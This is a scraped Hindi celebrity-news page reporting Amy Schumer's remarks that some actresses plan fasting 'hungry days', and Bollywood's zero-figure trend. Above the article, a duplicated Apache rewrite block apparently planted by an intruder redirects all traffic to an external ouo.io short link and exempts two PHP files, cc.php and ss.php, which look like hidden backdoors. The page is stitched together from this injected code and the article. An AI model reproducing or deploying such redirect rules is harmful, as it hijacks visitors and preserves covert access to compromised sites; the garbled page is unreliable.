
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 323
Nextमुंबई। एक्ट्रेस एमी शूमर का कहना है कि कैमरे के सामने आने वाली ज्यादातर महिलाएं 'हंगरी डेज' की प्लानिंग बनाकर पतली होती हैं। इन 'हंगरी डेज' में ये एक्ट्रेसेज खाती नहीं हैं। शूमर ने अपनी एक्ट्रेस सहेलियों के बारे में यह बात कही। उन्होंने कहा कि उनकी कुछ मशहूर दोस्त कैलेंडर में ऐसे दिनों की प्लानिंग करती हैं और इस दौरान वे भूखी रहती हैं। वह बाहर जाने के सारे कार्यक्रम रद्द कर देती हैं ताकि घर में रह सकें और आराम से अपने 'हंगरी डे' को सफल बना सकें। शूमर ने कहा कि वह अपने लुक्स से नाखुशी महसूस नहीं करतीं। उन्होंने कहा, "यह मजेदार है। मैं अवॉर्ड शोज में जाती हूं और खुदको बेस्ट दिखाने की कोशिश करती हूं और मैं कॉस्टयूम डिजाइनर जैसी दिखती हूं और मुझे इस पर गर्व है।" बता दें कि बॉलीवुड में भी जीरो फिगर का खासा क्रेज है। इसे फेमस बनाने वाली एक्ट्रेसेज में सबसे ऊपर करीना कपूर का नाम आता है। 'टशन' फिल्म में करीना ने अपने लुक्स से लोगों को दीवाना बना दिया था। अब तो ये ट्रेंड सभी के सिर चढ़ कर बोल रहा है। फिल्मों में एक्टिव एक्ट्रेसेज से अलग फिल्मी पर्दे से दूर रहीं एक्ट्रेसेज भी फिटनेस के मामले में पूरा ध्यान दे रही हैं। कुछ समय पहले सुष्मिता सेन अपनी सिक्स पैक ऐब्स वाली तस्वीर की वजह से खबरों में छाई रही थीं।